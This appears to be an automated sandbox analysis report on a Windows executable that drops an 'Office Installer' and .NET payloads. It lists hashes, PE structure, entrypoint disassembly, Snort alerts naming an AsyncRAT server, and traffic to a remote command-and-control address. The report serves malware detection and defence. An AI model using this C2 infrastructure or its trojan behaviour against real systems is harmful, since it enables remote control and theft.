Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Y."f...............2.............P.........@.....................................S....`..................................................G.......`...n...@%..6...................................................................U...............................text............................... ..`.rdata..p:.... ..<..................@..@.pdata...6...@%..8...0%.............@..@.gehcont`.....&......h&.............@..@.00cfg.. .....&......j&.............@..@.gxfg...`.....&......l&.............@..@_RDATA..\.....'......D'.............@..@.data.....u...'...m..F'.............@....rsrc....n...`...p...4..............@..@.debug_l{..........................@..B.debug_i...........................@..B.debug_a...........................@..B.debug_a0...........................@..B.debug_s............................@..B.debug_fH.... ......................@..B.modplug

C:\Users\user\AppData\Local\Temp\Office Installer.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\Office Installer.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	507
Entropy (8bit):	5.0409205425757
Encrypted:	false
SSDEEP:	12:tmjnOCcvx56dj5NylzLbF+5T0mLrGuYYySBb:TkvMLA5T0ErnYTc
MD5:	2A8204CFB0C0B6B7D73880F70FF4DCE7
SHA1:	16129E43B8C1619147B5A8452EBEFA6BD66AC49E
SHA-256:	9A3CCCA43D3BFE395820E58E478A1CFC1A5D9CF606B7F63000E03C8EF63C81C9
SHA-512:	8E5AF9FA575FC20E2443E7040A52107D6F95426537169B4BBC4FA6291BB723976474FB0C875DA9ED3586B31B568B5B744E5926A5C059E07914B7B7E7EA188A24
Malicious:	false
Preview:	...[Configurations]..DarkTheme = 0..NOSOUND = 0..HIDE_RETAIL = 0..ColorSwitches = 1..ARIA2_USE = 0..THREAD = 0..USEPROXY = 0..proxy = ..port = ..PosR = 2..ArchR = 1..Update = 6..DlndArch = 1..CBBranch = 0..Word = 1..Excel = 1..Access = 1..Publisher = 1..Teams = 1..Groove = 1..Lync = 1..OneNote = 1..Outlook = 1..PowerPoint = 1..OneDrive = 1..Project = 1..ProjectPro = 1..ProjectMondo = 1..Visio = 1..VisioPro = 1..VisioMondo = 1..ProofingTools = 1..cdv = 16.0.12527.22286..langs = ru-RU\|..dnld = ru-RU\|..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ay3543wj.qil.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lskegv2z.c5e.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n4rmtvfp.sld.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opfzmfn2.2st.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svbcxkr5.zts.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uqqjhq24.eqg.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\files\ver.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	58034
Entropy (8bit):	4.801497821479288
Encrypted:	false
SSDEEP:	1536:MMEgzFpC8IpcDRJyP5hUKr1fZdJtyE8CnyHOaGYiejuOOjkaUxxHgaZaUROoAc6e:7/
MD5:	FF3E8B852591ADD937CCB0EF19548949
SHA1:	3B9F6715C7A4D81B469E8039E6EED1EF21E380FF
SHA-256:	FAEDE7842D7A4875FCFB9E80B4374A40047F72ECA358B25FE663F20AFBF92545
SHA-512:	8244A69A44F39D8FF63B757C6C91ABA9ACB9CF1135B39D65B82CC97112CC65B9F1C03C4485E06DA0059F52FC0897F91A7FF05B1C928DFDAF8C9F2136C7978594
Malicious:	true
Preview:	[.. {.. "Id": 15,.. "Name": "Default",.. "Order": 100,.. "FFN": "1d2d2ea6-1680-4c56-ac58-a441c8c24ff9",.. "AvailableBuild": "16.0.10410.20003",.. "ThrottleLevel": 1000,.. "LkgBuild": "16.0.10410.20003",.. "ExpiredBuilds": [],.. "ForkName": "LTSB2018",.. "BuildRank": 1,.. "Type": "Default",.. "UpdatedTimeUtc": "2024-04-18T18:55:11.79",.. "OfficeTenantIds": [],.. "OfficeProductNames": [],.. "OfficeCultures": [],.. "OfficeBitness": [],.. "OsVersions": [],.. "OfficePlatforms": [],.. "IsDefault": true.. },.. {.. "Id": 92546,.. "Name": "Default",.. "Order": 100,.. "FFN": "2e148de9-61c8-4051-b103-4af54baffbb4",.. "AvailableBuild": "16.0.10351.20054",.. "ThrottleLevel": 1000,.. "LkgBuild": "16.0.10351.20054",.. "ExpiredBuilds": [],.. "ForkName": "LTSB2018",.. "BuildRank": 1,.. "Type": "Default",.. "UpdatedTimeUtc": "2020-03-10T14:38:59.337",.. "OfficeTenantIds": [],.. "OfficeProductNames": [],

C:\Users\user\AppData\Local\Vulvvmkewji.exe

Download File

Process:	C:\Users\user\Desktop\Gm602axA2d.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	8936960
Entropy (8bit):	3.2359643434714824
Encrypted:	false
SSDEEP:	196608:n7OmlldPmE447xpyHBJgU9BcDzZG6M7kAev0T7rnXkb7iJ877Ubx1/koaM9AqPgl:n7OmlldPmE447xpyHBJgU9BcDzZG6M7+
MD5:	55B293F5BC4F0A9CA106B3ADC2AF7F79
SHA1:	91B91815AA36D66A775790404111A2A2759BAB74
SHA-256:	0D9C95A567B68AEA53A66B961220A6D5FF14134A91A7EE3B31DEC8A9EC74FAFA
SHA-512:	40F1D51D2051DD62E6A9D2DDE31648AA54A12BE45BB0BB3F28B2761CDE63A7C0D40BB4C9997449CBB2EC27411020A77F96CF37BE4E84D9D0F8F1FE7ABC789567
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63% Antivirus: Virustotal, Detection: 64%, Browse
Joe Sandbox View:	Filename: jh3lXSnrfk.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i.(f.................\|..........r.... ........@.. ....................................`.....................................W.................................................................................... ............... ..H............text...xz... ...\|.................. ..`.rsrc................~..............@..@.reloc...............\..............@..B................T.......H........=..P\......6.....................................................(....:.(......(....."............{...."..}.......2.,..o(........0../........(.....+!..o......-..../..o$....+..o&.....-....0............(......-...Q...Q.....0..I........o...-...(....+(..o...o$...3..o....o%...+..o....o'....,...o...o+.......0..>........o&.......(......o$...o'....o$...,..o$....o+.....o%.....o+......0..>........o$.......(......o&...o%....o&...,..o&....o+.....o'.....o+...*..

C:\Users\user\AppData\Roaming\Lxfrfbi.exe

Download File

Process:	C:\Users\user\AppData\Local\Vulvvmkewji.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	8936960
Entropy (8bit):	3.2359643434714824
Encrypted:	false
SSDEEP:	196608:n7OmlldPmE447xpyHBJgU9BcDzZG6M7kAev0T7rnXkb7iJ877Ubx1/koaM9AqPgl:n7OmlldPmE447xpyHBJgU9BcDzZG6M7+
MD5:	55B293F5BC4F0A9CA106B3ADC2AF7F79
SHA1:	91B91815AA36D66A775790404111A2A2759BAB74
SHA-256:	0D9C95A567B68AEA53A66B961220A6D5FF14134A91A7EE3B31DEC8A9EC74FAFA
SHA-512:	40F1D51D2051DD62E6A9D2DDE31648AA54A12BE45BB0BB3F28B2761CDE63A7C0D40BB4C9997449CBB2EC27411020A77F96CF37BE4E84D9D0F8F1FE7ABC789567
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63% Antivirus: Virustotal, Detection: 64%, Browse
Joe Sandbox View:	Filename: jh3lXSnrfk.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i.(f.................\|..........r.... ........@.. ....................................`.....................................W.................................................................................... ............... ..H............text...xz... ...\|.................. ..`.rsrc................~..............@..@.reloc...............\..............@..B................T.......H........=..P\......6.....................................................(....:.(......(....."............{...."..}.......2.,..o(........0../........(.....+!..o......-..../..o$....+..o&.....-....0............(......-...Q...Q.....0..I........o...-...(....+(..o...o$...3..o....o%...+..o....o'....,...o...o+.......0..>........o&.......(......o$...o'....o$...,..o$....o+.....o%.....o+......0..>........o$.......(......o&...o%....o&...,..o&....o+.....o'.....o+...*..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.252346495986165
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Gm602axA2d.exe
File size:	19'303'424 bytes
MD5:	2d25ca067a272bd8542cabe1ff9985d1
SHA1:	594fb8d239a5ffaa654a13415fa95965ba47d2a8
SHA256:	da3a59fdb9f1414f6d726429c609ea5b6377c9d96d22ffb13f75352eec6be3a4
SHA512:	6a3befe5a0d9a00077ccbe5ec2f275760dffa754c4389f18ba0225ef8a8f107e78aea12caee3d25ad75028fcda56417bb540f4958fcf5da6549904c319ea3583
SSDEEP:	393216:ozIk5m3MgwV+WN+9vnd578wO+h39L8ArcD/i3vZNb63gH4R6Z4GQSWQmrxaf:oP43wz/mtYzinb6f3GQPc
TLSH:	F917B1CE5AD12C4AFE51796E1DFE81CBD7210A3319F99E2B7C6C5928409AC8D0C5783E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.............................&..............@"...@...........................&.......&....................................

File Icon


Icon Hash:	070786313073390e

Static PE Info

General

Entrypoint:	0x4014d1
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	a9c887a4f18a3fede2cc29ceea138ed3

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 00000008h
nop
mov eax, 00000004h
push eax
mov eax, 00000000h
push eax
lea eax, dword ptr [ebp-04h]
push eax
call 00007F440943525Dh
add esp, 0Ch
mov eax, 004014AFh
push eax
call 00007F4409435297h
mov eax, 00000001h
push eax
call 00007F4409435294h
add esp, 04h
mov eax, 00030000h
push eax
mov eax, 00010000h
push eax
call 00007F4409435288h
add esp, 08h
mov eax, dword ptr [01623E34h]
mov ecx, dword ptr [01623E38h]
mov edx, dword ptr [01623E3Ch]
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-04h]
push eax
mov eax, dword ptr [01624000h]
push eax
push edx
push ecx
mov eax, dword ptr [ebp-08h]
push eax
call 00007F4409435262h
add esp, 14h
mov eax, dword ptr [01623E34h]
mov ecx, dword ptr [01623E38h]
mov edx, dword ptr [01623E3Ch]
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [edx]
push eax
mov eax, dword ptr [ecx]
push eax
mov eax, dword ptr [ebp-08h]
mov eax, dword ptr [eax]
push eax
call 00007F440943503Ch
add esp, 0Ch
push eax
call 00007F4409435238h
add esp, 04h
leave
ret
push ebp
mov ebp, esp
sub esp, 00000004h
nop
mov eax, dword ptr [01623E34h]
mov ecx, dword ptr [ebp+08h]
mov dword ptr [eax], ecx
mov eax, dword ptr [00000000h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1223dc0	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1225000	0x45f60	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1223e10	0x58	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x668	0x800	ad4af824572eb06790f7105a25dd8ad2	False	0.4091796875	data	4.6780492760191175	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2000	0x1221fc3	0x1222000	deb61fa4d433070104ad03379787b001	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x1224000	0x4	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1225000	0x45f60	0x46000	3f930879a0d0c1c4b5a96d9adb1b0262	False	0.18866838727678573	data	4.5688090947160935	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1225190	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 270336	English	United States	0.1734214575258159
RT_ICON	0x12671b8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.3967842323651452
RT_ICON	0x1269760	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.47303001876172607
RT_ICON	0x126a808	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6843971631205674
RT_GROUP_ICON	0x126ac70	0x3e	data	English	United States	0.8225806451612904
RT_MANIFEST	0x126acb0	0x2aa	XML 1.0 document, ASCII text	English	United States	0.4750733137829912

Imports

DLL	Import
msvcrt.dll	malloc, memset, strcmp, strcpy, getenv, sprintf, fopen, fwrite, fclose, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
shell32.dll	ShellExecuteA
kernel32.dll	SetUnhandledExceptionFilter

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/29/24-10:22:16.075124	TCP	2030673	ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)	7707	49731	95.211.208.153	192.168.2.4
04/29/24-10:22:16.075124	TCP	2035595	ET TROJAN Generic AsyncRAT Style SSL Cert	7707	49731	95.211.208.153	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 29, 2024 10:22:15.630347967 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:15.840632915 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:15.840729952 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:15.859167099 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:16.075124025 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:16.075242996 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:16.075308084 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:16.080893993 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:16.292360067 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:16.461570024 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:17.414416075 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:17.669775963 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:17.669847012 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:17.919718027 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:28.219906092 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:28.482287884 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:28.482350111 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:28.693238974 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:28.859606028 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:29.069948912 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:29.076210976 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:29.330446005 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:29.330508947 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:29.581278086 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:32.487689018 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:32.652614117 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:32.863217115 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:33.051605940 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:38.979326963 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:39.238065004 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:39.238126993 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:39.448857069 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:39.557642937 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:39.767855883 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:39.796116114 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:40.049076080 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:40.049170017 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:40.299834967 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:50.952912092 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:51.205315113 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:51.205385923 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:51.415945053 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:51.464746952 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:51.674972057 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:51.676357985 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:51.939692974 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:22:51.939752102 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:22:52.205406904 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:01.710133076 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:01.970810890 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:01.971059084 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:02.181607962 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:02.221693993 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:02.431740046 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:02.478703976 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:02.688843966 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:02.743675947 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:03.665811062 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:03.924058914 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:03.924175024 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:04.189623117 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:13.231007099 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:13.568747997 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:13.916753054 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:14.585724115 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:15.050271034 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:15.050288916 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:15.050306082 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:15.050853968 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:15.096719027 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:15.306986094 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:15.308906078 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:15.564558983 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:15.564681053 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:15.830195904 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:25.600935936 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:25.861306906 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:25.861382008 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:26.072050095 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:26.135744095 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:26.346571922 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:26.446736097 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:27.474490881 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:27.736291885 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:27.736358881 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:28.002100945 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:32.518050909 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:32.567745924 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:32.777904034 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:32.823756933 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:36.368417025 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:36.626815081 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:36.626916885 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:36.837754011 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:36.892796040 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:37.103027105 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:37.104882956 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:37.361263037 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:37.361397028 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:37.626835108 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:47.474623919 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:47.736080885 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:47.736144066 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:47.946727991 CEST	7707	49731	95.211.208.153	192.168.2.4
Apr 29, 2024 10:23:47.997880936 CEST	49731	7707	192.168.2.4	95.211.208.153
Apr 29, 2024 10:23:48.208055973 CEST	7707	49731	95.211.208.153	192.168.2.4
